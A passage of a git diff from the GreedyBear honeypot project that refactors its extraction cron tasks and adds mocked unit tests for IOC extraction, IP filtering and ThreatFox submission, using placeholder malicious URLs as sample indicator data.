+from celery import shared_task
 from greedybear.settings import CLUSTER_COWRIE_COMMAND_SEQUENCES
 
 
 @shared_task()
-def extract_log4pot():
-    from greedybear.cronjobs.log4pot import ExtractLog4Pot
+def extract_all():
+    from greedybear.cronjobs.extract import ExtractionJob
 
-    ExtractLog4Pot().execute()
-
-
-@shared_task()
-def extract_cowrie():
-    from greedybear.cronjobs.cowrie import ExtractCowrie
-
-    ExtractCowrie().execute()
-
-
-# FEEDS
-@shared_task()
-def extract_general():
-    from greedybear.cronjobs.general import ExtractAllGenerals
-
-    ExtractAllGenerals().execute()
-
-
-@shared_task()
-def extract_sensors():
-    from greedybear.cronjobs.sensors import ExtractSensors
-
-    ExtractSensors().execute()
+    ExtractionJob().execute()
 
 
 @shared_task()
diff --git a/tests/__init__.py b/tests/__init__.py
index e7a23e29..00a68e29 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -1,5 +1,6 @@
 from datetime import datetime
 from hashlib import sha256
+from unittest.mock import Mock
 
 from certego_saas.apps.user.models import User
 from django.test import TestCase
@@ -13,6 +14,7 @@ def setUpTestData(cls):
 
         cls.heralding = GeneralHoneypot.objects.create(name="Heralding", active=True)
         cls.ciscoasa = GeneralHoneypot.objects.create(name="Ciscoasa", active=True)
+        cls.ddospot = GeneralHoneypot.objects.create(name="Ddospot", active=False)
 
         cls.current_time = datetime.now()
         cls.ioc = IOC.objects.create(
@@ -175,3 +177,41 @@ def tearDownClass(self):
         IOC.objects.all().delete()
         CowrieSession.objects.all().delete()
         CommandSequence.objects.all().delete()
+
+
+class ExtractionTestCase(CustomTestCase):
+    def setUp(self):
+        self.mock_ioc_repo = Mock()
+        self.mock_sensor_repo = Mock()
+        self.mock_session_repo = Mock()
+
+    def _create_mock_ioc(
+        self,
+        name="1.2.3.4",
+        ioc_type="ip",
+        attack_count=1,
+        interaction_count=1,
+        related_urls=[],
+        destination_ports=[],
+        login_attempts=0,
+        days_seen=[],
+        last_seen=datetime.now(),
+        ip_reputation="",
+        asn=1234,
+    ):
+        mock = Mock(spec=IOC)
+        mock.name = name
+        mock.type = ioc_type
+        mock.scanner = False
+        mock.payload_request = False
+        mock.attack_count = attack_count
+        mock.interaction_count = interaction_count
+        mock.related_urls = related_urls
+        mock.destination_ports = destination_ports
+        mock.days_seen = days_seen
+        mock.login_attempts = login_attempts
+        mock.last_seen = last_seen
+        mock.ip_reputation = ip_reputation
+        mock.asn = asn
+        mock.number_of_days_seen = len(mock.days_seen)
+        return mock
diff --git a/tests/greedybear/__init__.py b/tests/greedybear/__init__.py
deleted file mode 100644
index e69de29b..00000000
diff --git a/tests/greedybear/cronjobs/__init__.py b/tests/greedybear/cronjobs/__init__.py
deleted file mode 100644
index e69de29b..00000000
diff --git a/tests/greedybear/cronjobs/only_manual/test_cowrie.py b/tests/greedybear/cronjobs/only_manual/test_cowrie.py
deleted file mode 100644
index cb6b780a..00000000
--- a/tests/greedybear/cronjobs/only_manual/test_cowrie.py
+++ /dev/null
@@ -1,16 +0,0 @@
-# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
-# See the file 'LICENSE' for copying permission.
-
-from unittest import TestCase
-
-from greedybear.cronjobs import cowrie
-from greedybear.models import IOC
-
-
-class CowrieTestCase(TestCase):
-    def test_sensors(self, *args, **kwargs):
-        a = cowrie.ExtractCowrie()
-        a.execute()
-        self.assertTrue(a.success)
-        iocs = IOC.objects.filter(cowrie=True)
-        self.assertTrue(iocs)
diff --git a/tests/greedybear/cronjobs/only_manual/test_general.py b/tests/greedybear/cronjobs/only_manual/test_general.py
deleted file mode 100644
index 9c3a6d4b..00000000
--- a/tests/greedybear/cronjobs/only_manual/test_general.py
+++ /dev/null
@@ -1,28 +0,0 @@
-# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
-# See the file 'LICENSE' for copying permission.
-
-from unittest import TestCase
-
-from django.db.models import Q
-from greedybear.cronjobs import general
-from greedybear.models import IOC
-
-# FEEDS
-
-
-class GeneralTestCase(TestCase):
-    def test_sensors(self, *args, **kwargs):
-        a = general.ExtractAllGenerals()
-        a.execute()
-        self.assertTrue(a.success)
-
-        iocs = []
-        for hp in ["heralding", "ciscoasa"]:
-            iocs.extend(IOC.objects.filter(Q(general_honeypot__name__iexact=hp)))
-        self.assertTrue(iocs)
-
-        ciscoasa = general.ExtractGeneral(general.Honeypot("Ciscoasa"))
-        ciscoasa.execute()
-        glutton = general.ExtractGeneral(general.Honeypot("Glutton"))
-        glutton.execute()
-        assert ciscoasa.first_time_run != glutton.first_time_run
diff --git a/tests/greedybear/cronjobs/only_manual/test_log4pot.py b/tests/greedybear/cronjobs/only_manual/test_log4pot.py
deleted file mode 100644
index 7ff4db5d..00000000
--- a/tests/greedybear/cronjobs/only_manual/test_log4pot.py
+++ /dev/null
@@ -1,16 +0,0 @@
-# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
-# See the file 'LICENSE' for copying permission.
-
-from unittest import TestCase
-
-from greedybear.cronjobs import log4pot
-from greedybear.models import IOC
-
-
-class Log4PotTestCase(TestCase):
-    def test_sensors(self, *args, **kwargs):
-        a = log4pot.ExtractLog4Pot()
-        a.execute()
-        self.assertTrue(a.success)
-        iocs = IOC.objects.filter(log4j=True)
-        self.assertTrue(iocs)
diff --git a/tests/greedybear/cronjobs/only_manual/test_sensors.py b/tests/greedybear/cronjobs/only_manual/test_sensors.py
deleted file mode 100644
index b5386ab3..00000000
--- a/tests/greedybear/cronjobs/only_manual/test_sensors.py
+++ /dev/null
@@ -1,16 +0,0 @@
-# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
-# See the file 'LICENSE' for copying permission.
-
-from unittest import TestCase
-
-from greedybear.cronjobs import sensors
-from greedybear.models import Sensors
-
-
-class SensorsTestCase(TestCase):
-    def test_sensors(self, *args, **kwargs):
-        s = sensors.ExtractSensors()
-        s.execute()
-        self.assertTrue(s.success)
-        s_ob = Sensors.objects.all()
-        self.assertTrue(s_ob)
diff --git a/tests/test_extraction.py b/tests/test_extraction.py
deleted file mode 100644
index f9d835bb..00000000
--- a/tests/test_extraction.py
+++ /dev/null
@@ -1,69 +0,0 @@
-from datetime import datetime
-
-from greedybear.cronjobs.base import get_time_window
-
-from . import CustomTestCase
-
-
-class TimeWindowCalculationTestCase(CustomTestCase):
-    def test_basic_10min_window(self):
-        """Test a basic window without custom lookback"""
-        reference = datetime(2024, 1, 10, 14, 23)  # 14:23
-        start, end = get_time_window(reference)
-
-        expected_end = datetime(2024, 1, 10, 14, 20)  # 14:20
-        expected_start = datetime(2024, 1, 10, 14, 10)  # 14:10
-
-        self.assertEqual(start, expected_start)
-        self.assertEqual(end, expected_end)
-
-    def test_with_custom_lookback(self):
-        """Test window with custom lookback time"""
-        reference = datetime(2024, 1, 10, 14, 23)  # 14:23
-        start, end = get_time_window(reference, lookback_minutes=15)
-
-        expected_end = datetime(2024, 1, 10, 14, 20)  # 14:20
-        expected_start = datetime(2024, 1, 10, 14, 5)  # 14:05
-
-        self.assertEqual(start, expected_start)
-        self.assertEqual(end, expected_end)
-
-    def test_exact_boundary(self):
-        """Test behavior when reference time is exactly on a window boundary"""
-        reference = datetime(2024, 1, 10, 14, 20)  # 14:20 exactly
-        start, end = get_time_window(reference)
-
-        expected_end = datetime(2024, 1, 10, 14, 20)  # 14:20
-        expected_start = datetime(2024, 1, 10, 14, 10)  # 14:10
-
-        self.assertEqual(start, expected_start)
-        self.assertEqual(end, expected_end)
-
-    def test_invalid_lookback(self):
-        """Test that function raises ValueError for invalid lookback"""
-        reference = datetime(2024, 1, 10, 14, 23)
-
-        with self.assertRaises(ValueError):
-            get_time_window(reference, 5)
-
-    def test_day_boundary_crossing(self):
-        """Test behavior when window crosses a day boundary"""
-        reference = datetime(2024, 1, 11, 0, 5)  # 00:00
-        start, end = get_time_window(reference)
-
-        expected_end = datetime(2024, 1, 11, 0, 0)  # 00:00
-        expected_start = datetime(2024, 1, 10, 23, 50)  # 23:50 on previous day
-
-        self.assertEqual(start, expected_start)
-        self.assertEqual(end, expected_end)
-
-    def test_large_lookback(self):
-        """Test with a large lookback that crosses multiple days"""
-        reference = datetime(2024, 1, 10, 14, 23)  # 14:23
-        start, end = get_time_window(reference, lookback_minutes=60 * 24 * 3)
-
-        expected_end = datetime(2024, 1, 10, 14, 20)  # 14:20
-        expected_start = datetime(2024, 1, 7, 14, 20)  # 14:20, 3 days earlier
-
-        self.assertEqual(start, expected_start)
-        self.assertEqual(end, expected_end)
diff --git a/tests/test_extraction_strategies.py b/tests/test_extraction_strategies.py
new file mode 100644
index 00000000..a69a663d
--- /dev/null
+++ b/tests/test_extraction_strategies.py
@@ -0,0 +1,83 @@
+from unittest.mock import Mock, patch
+
+from greedybear.consts import SCANNER
+from greedybear.cronjobs.extraction.strategies import GenericExtractionStrategy
+
+from . import ExtractionTestCase
+
+
+class TestGenericExtractionStrategy(ExtractionTestCase):
+    def setUp(self):
+        super().setUp()
+        self.strategy = GenericExtractionStrategy(
+            honeypot="TestHoneypot",
+            ioc_repo=self.mock_ioc_repo,
+            sensor_repo=self.mock_sensor_repo,
+        )
+
+    @patch("greedybear.cronjobs.extraction.strategies.generic.iocs_from_hits")
+    @patch("greedybear.cronjobs.extraction.strategies.generic.threatfox_submission")
+    def test_processes_enabled_honeypot(self, mock_threatfox, mock_iocs_from_hits):
+        self.mock_ioc_repo.is_enabled.return_value = True
+
+        mock_ioc = self._create_mock_ioc()
+        mock_iocs_from_hits.return_value = [mock_ioc]
+
+        self.strategy.ioc_processor.add_ioc = Mock(return_value=mock_ioc)
+
+        hits = [{"src_ip": "1.2.3.4", "dest_port": 80, "@timestamp": "2025-01-01T00:00:00"}]
+
+        self.strategy.extract_from_hits(hits)
+
+        mock_iocs_from_hits.assert_called_once_with(hits)
+        self.strategy.ioc_processor.add_ioc.assert_called_once_with(mock_ioc, attack_type=SCANNER, general_honeypot_name="TestHoneypot")
+        self.assertEqual(len(self.strategy.ioc_records), 1)
+        mock_threatfox.assert_called_once()
+
+    @patch("greedybear.cronjobs.extraction.strategies.generic.iocs_from_hits")
+    def test_handles_none_ioc_record(self, mock_iocs_from_hits):
+        self.mock_ioc_repo.is_enabled.return_value = True
+        mock_ioc = self._create_mock_ioc()
+        mock_iocs_from_hits.return_value = [mock_ioc]
+
+        self.strategy.ioc_processor.add_ioc = Mock(return_value=None)
+
+        hits = [{"src_ip": "1.2.3.4", "dest_port": 80, "@timestamp": "2025-01-01T00:00:00"}]
+
+        self.strategy.extract_from_hits(hits)
+
+        self.assertEqual(len(self.strategy.ioc_records), 0)
+
+    @patch("greedybear.cronjobs.extraction.strategies.generic.iocs_from_hits")
+    def test_processes_multiple_iocs(self, mock_iocs_from_hits):
+        self.mock_ioc_repo.is_enabled.return_value = True
+
+        mock_ioc1 = self._create_mock_ioc("1.2.3.4")
+        mock_ioc2 = self._create_mock_ioc("5.6.7.8")
+        mock_iocs_from_hits.return_value = [mock_ioc1, mock_ioc2]
+        self.strategy.ioc_processor.add_ioc = Mock(side_effect=[mock_ioc1, mock_ioc2])
+
+        hits = [
+            {"src_ip": "1.2.3.4", "dest_port": 80, "@timestamp": "2025-01-01T00:00:00"},
+            {"src_ip": "5.6.7.8", "dest_port": 443, "@timestamp": "2025-01-01T00:00:00"},
+        ]
+
+        self.strategy.extract_from_hits(hits)
+
+        self.assertEqual(len(self.strategy.ioc_records), 2)
+        self.assertEqual(self.strategy.ioc_processor.add_ioc.call_count, 2)
+
+    @patch("greedybear.cronjobs.extraction.strategies.generic.iocs_from_hits")
+    def test_logs_correct_honeypot_name(self, mock_iocs_from_hits):
+        self.mock_ioc_repo.is_enabled.return_value = True
+
+        mock_ioc = self._create_mock_ioc("1.2.3.4")
+        mock_iocs_from_hits.return_value = [mock_ioc]
+        self.strategy.ioc_processor.add_ioc = Mock(return_value=mock_ioc)
+
+        hits = [{"src_ip": "1.2.3.4", "dest_port": 80, "@timestamp": "2025-01-01T00:00:00"}]
+
+        self.strategy.extract_from_hits(hits)
+
+        call_kwargs = self.strategy.ioc_processor.add_ioc.call_args[1]
+        self.assertEqual(call_kwargs["general_honeypot_name"], "TestHoneypot")
diff --git a/tests/test_extraction_utils.py b/tests/test_extraction_utils.py
new file mode 100644
index 00000000..7cd93373
--- /dev/null
+++ b/tests/test_extraction_utils.py
@@ -0,0 +1,319 @@
+from datetime import datetime
+from unittest.mock import Mock, patch
+
+from greedybear.consts import DOMAIN, IP
+from greedybear.cronjobs.extraction.utils import correct_ip_reputation, get_ioc_type, iocs_from_hits, is_whatsmyip_domain, threatfox_submission
+from greedybear.models import MassScanners, WhatsMyIP
+
+from . import CustomTestCase, ExtractionTestCase
+
+
+class TestGetIocType(CustomTestCase):
+    def test_ipv4_returns_ip(self):
+        self.assertEqual(get_ioc_type("1.2.3.4"), IP)
+
+    def test_ipv4_edge_cases(self):
+        self.assertEqual(get_ioc_type("0.0.0.0"), IP)
+        self.assertEqual(get_ioc_type("255.255.255.255"), IP)
+        self.assertEqual(get_ioc_type("192.168.1.1"), IP)
+
+    def test_domain_returns_domain(self):
+        self.assertEqual(get_ioc_type("example.com"), DOMAIN)
+
+    def test_subdomain_returns_domain(self):
+        self.assertEqual(get_ioc_type("sub.example.com"), DOMAIN)
+
+    def test_invalid_ip_returns_domain(self):
+        self.assertEqual(get_ioc_type("256.1.1.1"), DOMAIN)
+        self.assertEqual(get_ioc_type("1.2.3"), DOMAIN)
+
+
+class TestIsWhatsmyipDomain(CustomTestCase):
+    def test_returns_true_for_known_domain(self):
+        WhatsMyIP.objects.create(domain="some.domain.com")
+        result = is_whatsmyip_domain("some.domain.com")
+        self.assertTrue(result)
+
+    def test_returns_false_for_unknown_domain(self):
+        result = is_whatsmyip_domain("another.domain.com")
+        self.assertFalse(result)
+
+
+class TestCorrectIpReputationTestCase(CustomTestCase):
+    def test_returns_mass_scanner_when_in_database(self):
+        MassScanners.objects.create(ip_address="1.2.3.4")
+        result = correct_ip_reputation("1.2.3.4", "known attacker")
+        self.assertEqual(result, "mass scanner")
+
+    def test_returns_original_when_not_in_database(self):
+        result = correct_ip_reputation("1.2.3.4", "known attacker")
+        self.assertEqual(result, "known attacker")
+
+    def test_checks_mass_scanner_for_empty_reputation(self):
+        MassScanners.objects.create(ip_address="1.2.3.4")
+        result = correct_ip_reputation("1.2.3.4", "")
+        self.assertEqual(result, "mass scanner")
+
+    def test_preserves_other_reputations(self):
+        MassScanners.objects.create(ip_address="1.2.3.4")
+        result = correct_ip_reputation("1.2.3.4", "bot")
+        self.assertEqual(result, "bot")
+
+
+class IocsFromHitsTestCase(CustomTestCase):
+    def _create_hit(
+        self,
+        src_ip="1.2.3.4",
+        dest_port=22,
+        timestamp="2025-01-01T12:00:00.000Z",
+        hit_type="Cowrie",
+        ip_rep="",
+        asn=None,
+    ):
+        hit = {
+            "src_ip": src_ip,
+            "dest_port": dest_port,
+            "@timestamp": timestamp,
+            "type": hit_type,
+            "ip_rep": ip_rep,
+        }
+        if asn:
+            hit["geoip"] = {"asn": asn}
+        return hit
+
+    def test_creates_ioc_from_single_hit(self):
+        hits = [self._create_hit(src_ip="8.8.8.8", dest_port=22)]
+        iocs = iocs_from_hits(hits)
+        self.assertEqual(len(iocs), 1)
+        self.assertEqual(iocs[0].name, "8.8.8.8")
+        self.assertEqual(iocs[0].type, IP)
+
+    def test_groups_hits_by_ip(self):
+        hits = [
+            self._create_hit(src_ip="8.8.8.8", dest_port=22),
+            self._create_hit(src_ip="8.8.8.8", dest_port=80),
+            self._create_hit(src_ip="8.8.8.8", dest_port=443),
+        ]
+        iocs = iocs_from_hits(hits)
+        self.assertEqual(len(iocs), 1)
+        self.assertEqual(iocs[0].attack_count, 1)
+        self.assertEqual(iocs[0].interaction_count, 3)
+
+    def test_creates_separate_iocs_for_different_ips(self):
+        hits = [
+            self._create_hit(src_ip="8.8.8.8"),
+            self._create_hit(src_ip="1.1.1.1"),
+        ]
+        iocs = iocs_from_hits(hits)
+        self.assertEqual(len(iocs), 2)
+        names = {ioc.name for ioc in iocs}
+        self.assertEqual(names, {"8.8.8.8", "1.1.1.1"})
+
+    def test_aggregates_destination_ports(self):
+        hits = [
+            self._create_hit(src_ip="8.8.8.8", dest_port=22),
+            self._create_hit(src_ip="8.8.8.8", dest_port=80),
+            self._create_hit(src_ip="8.8.8.8", dest_port=443),
+        ]
+        iocs = iocs_from_hits(hits)
+        self.assertEqual(iocs[0].destination_ports, [22, 80, 443])
+
+    def test_deduplicates_ports(self):
+        hits = [
+            self._create_hit(src_ip="8.8.8.8", dest_port=22),
+            self._create_hit(src_ip="8.8.8.8", dest_port=22),
+            self._create_hit(src_ip="8.8.8.8", dest_port=22),
+        ]
+        iocs = iocs_from_hits(hits)
+        self.assertEqual(iocs[0].destination_ports, [22])
+
+    def test_handles_missing_dest_port(self):
+        hits = [
+            {"src_ip": "8.8.8.8", "@timestamp": "2025-01-01T12:00:00.000Z"},
+        ]
+        iocs = iocs_from_hits(hits)
+        self.assertEqual(iocs[0].destination_ports, [])
+
+    def test_extracts_asn_from_geoip(self):
+        hits = [self._create_hit(src_ip="8.8.8.8", asn=15169)]
+        iocs = iocs_from_hits(hits)
+        self.assertEqual(iocs[0].asn, 15169)
+
+    def test_handles_missing_geoip(self):
+        hits = [{"src_ip": "8.8.8.8", "@timestamp": "2025-01-01T12:00:00.000Z"}]
+        iocs = iocs_from_hits(hits)
+        self.assertIsNone(iocs[0].asn)
+
+    def test_extracts_timestamps(self):
+        hits = [
+            self._create_hit(src_ip="8.8.8.8", timestamp="2025-01-01T10:00:00.000Z"),
+            self._create_hit(src_ip="8.8.8.8", timestamp="2025-01-01T12:00:00.000Z"),
+            self._create_hit(src_ip="8.8.8.8", timestamp="2025-01-01T11:00:00.000Z"),
+        ]
+        iocs = iocs_from_hits(hits)
+        self.assertEqual(iocs[0].first_seen, datetime.fromisoformat("2025-01-01T10:00:00.000Z"))
+        self.assertEqual(iocs[0].last_seen, datetime.fromisoformat("2025-01-01T12:00:00.000Z"))
+
+    def test_filters_loopback_addresses(self):
+        hits = [
+            self._create_hit(src_ip="127.0.0.1"),
+            self._create_hit(src_ip="8.8.8.8"),
+        ]
+        iocs = iocs_from_hits(hits)
+        self.assertEqual(len(iocs), 1)
+        self.assertEqual(iocs[0].name, "8.8.8.8")
+
+    def test_filters_private_addresses(self):
+        hits = [
+            self._create_hit(src_ip="192.168.1.1"),
+            self._create_hit(src_ip="10.0.0.1"),
+            self._create_hit(src_ip="172.16.0.1"),
+            self._create_hit(src_ip="8.8.8.8"),
+        ]
+        iocs = iocs_from_hits(hits)
+        self.assertEqual(len(iocs), 1)
+        self.assertEqual(iocs[0].name, "8.8.8.8")
+
+    def test_filters_multicast_addresses(self):
+        hits = [
+            self._create_hit(src_ip="224.0.0.1"),
+            self._create_hit(src_ip="8.8.8.8"),
+        ]
+        iocs = iocs_from_hits(hits)
+        self.assertEqual(len(iocs), 1)
+        self.assertEqual(iocs[0].name, "8.8.8.8")
+
+    def test_filters_link_local_addresses(self):
+        hits = [
+            self._create_hit(src_ip="169.254.1.1"),
+            self._create_hit(src_ip="8.8.8.8"),
+        ]
+        iocs = iocs_from_hits(hits)
+        self.assertEqual(len(iocs), 1)
+        self.assertEqual(iocs[0].name, "8.8.8.8")
+
+    def test_filters_reserved_addresses(self):
+        hits = [
+            self._create_hit(src_ip="0.0.0.0"),
+            self._create_hit(src_ip="8.8.8.8"),
+        ]
+        iocs = iocs_from_hits(hits)
+        self.assertEqual(len(iocs), 1)
+        self.assertEqual(iocs[0].name, "8.8.8.8")
+
+    def test_heralding_counts_login_attempts(self):
+        hits = [
+            self._create_hit(src_ip="8.8.8.8", hit_type="Heralding"),
+            self._create_hit(src_ip="8.8.8.8", hit_type="Heralding"),
+            self._create_hit(src_ip="8.8.8.8", hit_type="Heralding"),
+        ]
+        iocs = iocs_from_hits(hits)
+        self.assertEqual(iocs[0].login_attempts, 3)
+
+    def test_non_heralding_no_login_attempts(self):
+        hits = [
+            self._create_hit(src_ip="8.8.8.8", hit_type="Cowrie"),
+            self._create_hit(src_ip="8.8.8.8", hit_type="Cowrie"),
+        ]
+        iocs = iocs_from_hits(hits)
+        self.assertEqual(iocs[0].login_attempts, 0)
+
+    def test_corrects_ip_reputation(self):
+        MassScanners.objects.create(ip_address="8.8.8.8")
+        hits = [self._create_hit(src_ip="8.8.8.8", ip_rep="known attacker")]
+        iocs = iocs_from_hits(hits)
+        self.assertEqual(iocs[0].ip_reputation, "mass scanner")
+
+    def test_empty_hits_returns_empty_list(self):
+        iocs = iocs_from_hits([])
+        self.assertEqual(iocs, [])
+
+
+class ThreatfoxSubmissionTestCase(ExtractionTestCase):
+    def setUp(self):
+        self.mock_log = Mock()
+
+    def _create_mock_payload_request(self, cowrie=False, log4j=False):
+        mock = self._create_mock_ioc()
+        mock.payload_request = True
+        mock.cowrie = cowrie
+        mock.log4j = log4j
+        mock.general_honeypot.all.return_value = []
+        return mock
+
+    def test_skips_non_payload_request_iocs(self):
+        ioc_record = self._create_mock_ioc()
+        threatfox_submission(ioc_record, ["http://malicious.com/payload"], self.mock_log)
+        self.mock_log.warning.assert_not_called()
+
+    @patch("greedybear.cronjobs.extraction.utils.settings")
+    def test_warns_when_api_key_missing(self, mock_settings):
+        mock_settings.THREATFOX_API_KEY = None
+        ioc_record = self._create_mock_payload_request()
+        threatfox_submission(ioc_record, ["http://malicious.com/payload"], self.mock_log)
+        self.mock_log.warning.assert_called_once_with("Threatfox API Key not available")
+
+    @patch("greedybear.cronjobs.extraction.utils.settings")
+    def test_skips_urls_without_path(self, mock_settings):
+        mock_settings.THREATFOX_API_KEY = "test-key"
+        ioc_record = self._create_mock_payload_request()
+        threatfox_submission(ioc_record, ["http://malicious.com", "http://evil.com/"], self.mock_log)
+        self.assertTrue(any("skipping" in str(call) for call in self.mock_log.info.call_args_list))
+
+    @patch("greedybear.cronjobs.extraction.utils.requests.post")
+    @patch("greedybear.cronjobs.extraction.utils.settings")
+    def test_submits_urls_with_path(self, mock_settings, mock_post):
+        mock_settings.THREATFOX_API_KEY = "test-key"
+        mock_post.return_value = Mock(text='{"status": "ok"}')
+        ioc_record = self._create_mock_payload_request(cowrie=True)
+        threatfox_submission(ioc_record, ["http://malicious.com/payload.sh"], self.mock_log)
+        mock_post.assert_called_once()
+        call_kwargs = mock_post.call_args[1]
+        self.assertEqual(call_kwargs["headers"]["Auth-Key"], "test-key")
+        self.assertIn("http://malicious.com/payload.sh", call_kwargs["json"]["iocs"])
+
+    @patch("greedybear.cronjobs.extraction.utils.requests.post")
+    @patch("greedybear.cronjobs.extraction.utils.settings")
+    def test_includes_honeypot_names_in_comment(self, mock_settings, mock_post):
+        mock_settings.THREATFOX_API_KEY = "test-key"
+        mock_post.return_value = Mock(text='{"status": "ok"}')
+        ioc_record = self._create_mock_payload_request(cowrie=True, log4j=True)
+        mock_honeypot = Mock()
+        mock_honeypot.name = "Dionaea"
+        ioc_record.general_honeypot.all.return_value = [mock_honeypot]
+        threatfox_submission(ioc_record, ["http://malicious.com/payload.sh"], self.mock_log)
+        call_kwargs = mock_post.call_args[1]
+        comment = call_kwargs["json"]["comment"]
+        self.assertIn("cowrie", comment)
+        self.assertIn("log4pot", comment)
+        self.assertIn("Dionaea", comment)
+
+    @patch("greedybear.cronjobs.extraction.utils.requests.post")
+    @patch("greedybear.cronjobs.extraction.utils.settings")
+    def test_logs_successful_submission(self, mock_settings, mock_post):
+        mock_settings.THREATFOX_API_KEY = "test-key"
+        mock_post.return_value = Mock(text='{"status": "ok"}')
+        ioc_record = self._create_mock_payload_request()
+        threatfox_submission(ioc_record, ["http://malicious.com/payload.sh"], self.mock_log)
+        self.assertTrue(any("successful" in str(call) for call in self.mock_log.info.call_args_list))
+
+    @patch("greedybear.cronjobs.extraction.utils.settings")
+    def test_filters_mixed_urls(self, mock_settings):
+        mock_settings.THREATFOX_API_KEY = "test-key"
+        ioc_record = self._create_mock_payload_request()
+
+        with patch("greedybear.cronjobs.extraction.utils.requests.post") as mock_post:
+            mock_post.return_value = Mock(text='{"status": "ok"}')
+            urls = [
+                "http://malicious.com",  # No path - skip
+                "http://evil.com/",  # Root path - skip
+                "http://bad.com/malware.exe",  # Has path - submit
+                "http://worse.com/path/to/payload",  # Has path - submit
+            ]
+            threatfox_submission(ioc_record, urls, self.mock_log)
+
+            call_kwargs = mock_post.call_args[1]
+            submitted_urls = call_kwargs["json"]["iocs"]
+            self.assertEqual(len(submitted_urls), 2)
+            self.assertIn("http://bad.com/malware.exe", submitted_urls)
+            self.assertIn("http://worse.com/path/to/payload", submitted_urls)
diff --git a/tests/test_ioc_processor.py b/tests/test_ioc_processor.py
new file mode 100644
index 00000000..038d79bf
--- /dev/null
+++ b/tests/test_ioc_processor.py
@@ -0,0 +1,308 @@
+from datetime import date, datetime
+from unittest.mock import patch
+
+from greedybear.consts import PAYLOAD_REQUEST, SCANNER
+from greedybear.cronjobs.extraction.ioc_processor import IocProcessor
+from greedybear.models import iocType
+
+from . import ExtractionTestCase
+
+
+class TestAddIoc(ExtractionTestCase):
+    def setUp(self):
+        super().setUp()
+        self.processor = IocProcessor(self.mock_ioc_repo, self.mock_sensor_repo)
+
+    def test_filters_sensor_ips(self):
+        self.mock_sensor_repo.sensors = {"192.168.1.1"}
+        ioc = self._create_mock_ioc(name="192.168.1.1")
+
+        result = self.processor.add_ioc(ioc, attack_type=SCANNER)
+
+        self.assertIsNone(result)
+        self.mock_ioc_repo.save.assert_not_called()
+
+    @patch("greedybear.cronjobs.extraction.ioc_processor.is_whatsmyip_domain")
+    def test_filters_whatsmyip_domains(self, mock_whatsmyip):
+        mock_whatsmyip.return_value = True
+        self.mock_sensor_repo.sensors = set()
+        ioc = self._create_mock_ioc(name="some.domain.com", ioc_type=iocType.DOMAIN)
+
+        result = self.processor.add_ioc(ioc, attack_type=SCANNER)
+
+        self.assertIsNone(result)
+        mock_whatsmyip.assert_called_once_with("some.domain.com")
+        self.mock_ioc_repo.save.assert_not_called()
+
+    def test_creates_new_ioc_when_not_exists(self):
+        self.mock_sensor_repo.sensors = set()
+        self.mock_ioc_repo.get_ioc_by_name.return_value = None
+        new_ioc = self._create_mock_ioc()
+        self.mock_ioc_repo.save.return_value = new_ioc
+
+        result = self.processor.add_ioc(new_ioc, attack_type=SCANNER)
+
+        self.mock_ioc_repo.get_ioc_by_name.assert_called_once_with("1.2.3.4")
+        self.mock_ioc_repo.save.assert_called()
+        self.assertIsNotNone(result)
+
+    def test_updates_existing_ioc_when_exists(self):
+        self.mock_sensor_repo.sensors = set()
+        existing_ioc = self._create_mock_ioc(attack_count=5)
+        self.mock_ioc_repo.get_ioc_by_name.return_value = existing_ioc
+        new_ioc = self._create_mock_ioc(attack_count=1)
+        self.mock_ioc_repo.save.return_value = existing_ioc
+
+        result = self.processor.add_ioc(new_ioc, attack_type=SCANNER)
+
+        self.mock_ioc_repo.get_ioc_by_name.assert_called_once_with("1.2.3.4")
+        self.assertEqual(result.attack_count, 6)
+
+    def test_sets_scanner_flag_for_scanner_attack_type(self):
+        self.mock_sensor_repo.sensors = set()
+        self.mock_ioc_repo.get_ioc_by_name.return_value = None
+        ioc = self._create_mock_ioc()
+        self.mock_ioc_repo.save.return_value = ioc
+
+        result = self.processor.add_ioc(ioc, attack_type=SCANNER)
+
+        self.assertTrue(result.scanner)
+        self.assertFalse(result.payload_request)
+
+    def test_sets_payload_request_flag_for_payload_attack_type(self):
+        self.mock_sensor_repo.sensors = set()
+        self.mock_ioc_repo.get_ioc_by_name.return_value = None
+        ioc = self._create_mock_ioc()
+        self.mock_ioc_repo.save.return_value = ioc
+
+        result = self.processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST)
+
+        self.assertFalse(result.scanner)
+        self.assertTrue(result.payload_request)
+
+    def test_adds_general_honeypot_when_provided(self):
+        self.mock_sensor_repo.sensors = set()
+        self.mock_ioc_repo.get_ioc_by_name.return_value = None
+        ioc = self._create_mock_ioc()
+        self.mock_ioc_repo.save.return_value = ioc
+        self.mock_ioc_repo.add_honeypot_to_ioc.return_value = ioc
+
+        self.processor.add_ioc(ioc, attack_type=SCANNER, general_honeypot_name="TestHoneypot")
+
+        self.mock_ioc_repo.add_honeypot_to_ioc.assert_called_once_with("TestHoneypot", ioc)
+
+    def test_skips_general_honeypot_when_not_provided(self):
+        self.mock_sensor_repo.sensors = set()
+        self.mock_ioc_repo.get_ioc_by_name.return_value = None
+        ioc = self._create_mock_ioc()
+        self.mock_ioc_repo.save.return_value = ioc
+
+        self.processor.add_ioc(ioc, attack_type=SCANNER, general_honeypot_name=None)
+
+        self.mock_ioc_repo.add_honeypot_to_ioc.assert_not_called()
+
+    def test_updates_days_seen_on_add(self):
+        self.mock_sensor_repo.sensors = set()
+        self.mock_ioc_repo.get_ioc_by_name.return_value = None
+        ioc = self._create_mock_ioc(days_seen=[], last_seen=datetime(2025, 1, 1, 12, 0, 0))
+        self.mock_ioc_repo.save.return_value = ioc
+
+        result = self.processor.add_ioc(ioc, attack_type=SCANNER)
+
+        self.assertEqual(len(result.days_seen), 1)
+        self.assertEqual(result.number_of_days_seen, 1)
+
+    def test_full_create_flow(self):
+        self.mock_sensor_repo.sensors = set()
+        self.mock_ioc_repo.get_ioc_by_name.return_value = None
+
+        ioc = self._create_mock_ioc(
+            name="1.2.3.4",
+            related_urls=["http://example.com"],
+            destination_ports=[80, 443],
+            days_seen=[],
+            last_seen=datetime(2025, 1, 1, 12, 0, 0),
+        )
+        self.mock_ioc_repo.save.return_value = ioc
+
+        result = self.processor.add_ioc(ioc, attack_type=SCANNER)
+
+        self.mock_ioc_repo.get_ioc_by_name.assert_called_once()
